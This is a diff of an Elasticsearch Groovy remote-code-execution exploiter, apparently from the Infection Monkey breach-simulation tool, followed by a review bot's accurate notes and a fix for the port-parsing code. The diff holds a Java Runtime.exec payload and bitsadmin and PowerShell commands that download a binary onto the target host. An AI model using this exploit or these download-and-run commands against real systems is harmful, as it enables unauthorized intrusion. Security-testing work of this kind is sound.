diff --git a/infection_monkey/exploit/elasticgroovy.py b/infection_monkey/exploit/elasticgroovy.py index 73fe359a5..f83fdc3e7 100644 --- a/infection_monkey/exploit/elasticgroovy.py +++ b/infection_monkey/exploit/elasticgroovy.py @@ -7,13 +7,12 @@ import json import logging import requests -from network.elasticfinger import ES_SERVICE, ES_PORT from exploit.web_rce import WebRCE from model import WGET_HTTP_UPLOAD import re -__author__ = 'danielg' +__author__ = 'danielg, VakarisZ' LOG = logging.getLogger(__name__) 
@@ -31,55 +30,30 @@ class ElasticGroovyExploiter(WebRCE): % """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()""" JAVA_GET_BIT_LINUX = JAVA_CMD % '/bin/uname -m' - DOWNLOAD_TIMEOUT = 300 # copied from rdpgrinder - # Both commands are prepared for use in future development RDP_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s' - POWERSHELL_COMMAND = r"powershell -Command \\\"Invoke-WebRequest -Uri '%(http_path)s' -OutFile '%(monkey_path)s' -UseBasicParsing\\\"" + POWERSHELL_COMMAND = r"powershell -Command \\\"Invoke-WebRequest -Uri '%(http_path)s'" \ + r" -OutFile '%(monkey_path)s' -UseBasicParsing\\\"" _TARGET_OS_TYPE = ['linux', 'windows'] def __init__(self, host): super(ElasticGroovyExploiter, self).__init__(host) - def exploit_host(self): - # self.exploit_host_linux() - if ES_SERVICE not in self.host.services: - LOG.info("Host: %s doesn't have ES open" % self.host.ip_addr) - return False - # Build url from host and elastic port(not https) - urls = self.build_potential_urls([[ES_PORT, False]], ['_search?pretty']) - vulnerable_urls = [] - for url in urls: - if self.check_if_exploitable(url): - vulnerable_urls.append(url) - self._exploit_info['vulnerable_urls'] = vulnerable_urls - if not vulnerable_urls: - return False + def get_exploit_config(self): + exploit_config = super(ElasticGroovyExploiter, self).get_exploit_config() + exploit_config['dropper'] = True + exploit_config['url_extensions'] = ['_search?pretty'] + exploit_config['upload_commands'] = {'linux': WGET_HTTP_UPLOAD, 'windows': self.RDP_CMDLINE_HTTP} + return exploit_config - if self.skip_exist and self.check_remote_files(vulnerable_urls[0]): - LOG.info("Host %s was already infected under the current configuration, done" % self.host) - return True - - if not self.set_host_arch(vulnerable_urls[0]): - return False - - commands = {'windows': self.RDP_CMDLINE_HTTP, - 'linux': WGET_HTTP_UPLOAD} - - data = 
self.upload_monkey(vulnerable_urls[0], commands) - - # We can't use 'if not' because response may be '' - if data is not False and data['response'] is False: - return False - - if self.change_permissions(vulnerable_urls[0], data['path']) is False: - return False - - if self.execute_remote_monkey(vulnerable_urls[0], data['path'], True) is False: - return False - - return True + def get_open_service_ports(self, port_list, names): + # We must append elastic port we get from elastic fingerprint module because It's not marked as 'http' service + valid_ports = super(ElasticGroovyExploiter, self).get_open_service_ports(port_list, names) + elastic_service = [service for service in self.host.services if 'elastic-search' in service][0] + elastic_port = [elastic_service.lstrip('elastic-search-'), False] + valid_ports.append(elastic_port) + return valid_ports def exploit(self, url, command): command = re.sub(r"\\", r"\\\\\\\\", command)
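Review bot: In the new `get_open_service_ports`, `[service for service in self.host.services if 'elastic-search' in service][0]` raises IndexError on any host whose fingerprint recorded no elastic-search service, whereas the removed `exploit_host` handled that case by logging and returning False; the `[0]` should be guarded. The same line's `elastic_service.lstrip('elastic-search-')` strips a leading character set ({e,l,a,s,t,i,c,r,h,-}), not the prefix, so it yields the port only because digits are outside that set; a prefix slice (`service[len(prefix):]`) says what is meant and will not silently corrupt the port if the service name ever changes. The hard-coded `'elastic-search'` literal also replaces the `ES_SERVICE` constant whose import the first hunk removes, so the service name now lives in two places; consider keeping one source of truth. Whether the base class expects the appended port as a str or an int is not visible in this hunk — confirm against `WebRCE.get_open_service_ports`.
```python
    def get_open_service_ports(self, port_list, names):
        # Elastic port comes from the fingerprint module, which does not mark it as an 'http' service
        valid_ports = super(ElasticGroovyExploiter, self).get_open_service_ports(port_list, names)
        prefix = 'elastic-search-'
        elastic_services = [service for service in self.host.services if service.startswith(prefix)]
        if not elastic_services:
            # No ES fingerprint for this host: return what the base class found instead of raising
            return valid_ports
        valid_ports.append([elastic_services[0][len(prefix):], False])
        return valid_ports
```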